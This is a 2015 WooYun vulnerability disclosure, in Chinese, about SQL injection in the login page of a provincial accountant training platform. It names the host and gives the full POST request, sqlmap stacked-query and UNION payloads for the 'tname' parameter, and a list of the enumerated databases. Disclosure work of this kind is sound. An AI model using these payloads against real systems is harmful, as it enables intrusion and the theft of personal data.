当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0138145

漏洞标题:某省会计人员继续教育培训平台存在SQL注入泄漏大量数据信息

相关厂商:某省会计人员继续教育培训平台

漏洞作者: 路人甲

提交时间:2015-08-31 14:44

修复时间:2015-10-15 14:46

公开时间:2015-10-15 14:46

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:16

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-08-31: 积极联系厂商并且等待厂商认领中,细节不对外公开
2015-10-15: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

漏洞地址:

POST /logincenter.asp HTTP/1.1
Host: www.gzczkj.cn
Proxy-Connection: keep-alive
Content-Length: 29
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: http://www.gzczkj.cn
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Referer: http://www.gzczkj.cn/
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.8
Cookie: ASPSESSIONIDQAQRRRQA=HLLCNAHBJEGIBGMFPGBCAFKK; NEWBANNER=NEWBANNER; bkcss=bkcss
tname=admin&idcard=admin&bt1=


tname参数存在注入时间盲注

---
Parameter: tname (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: tname=admin';WAITFOR DELAY '0:0:5'--&idcard=admin&bt1=
Type: UNION query
Title: Generic UNION query (NULL) - 2 columns
Payload: tname=admin' UNION ALL SELECT NULL,CHAR(113)+CHAR(120)+CHAR(112)+CHAR(118)+CHAR(113)+CH
AR(100)+CHAR(113)+CHAR(80)+CHAR(110)+CHAR(117)+CHAR(84)+CHAR(81)+CHAR(99)+CHAR(90)+CHAR(104)+CHAR(11
3)+CHAR(113)+CHAR(122)+CHAR(122)+CHAR(113)-- &idcard=admin&bt1=
---
[13:06:07] [INFO] testing Microsoft SQL Server
[13:06:08] [INFO] confirming Microsoft SQL Server
[13:06:11] [INFO] the back-end DBMS is Microsoft SQL Server
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0
back-end DBMS: Microsoft SQL Server 2005

漏洞证明:

数据库:

available databases [12]:
[*] Data
[*] DBA_VS_MONITOR
[*] gzczkj
[*] itat_itat2009
[*] itat_news_2008
[*] itatpro2009
[*] master
[*] model
[*] msdb
[*] ReportServer
[*] ReportServerTempDB
[*] tempdb


1.png


修复方案:

过滤

版权声明:转载请注明来源 路人甲@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝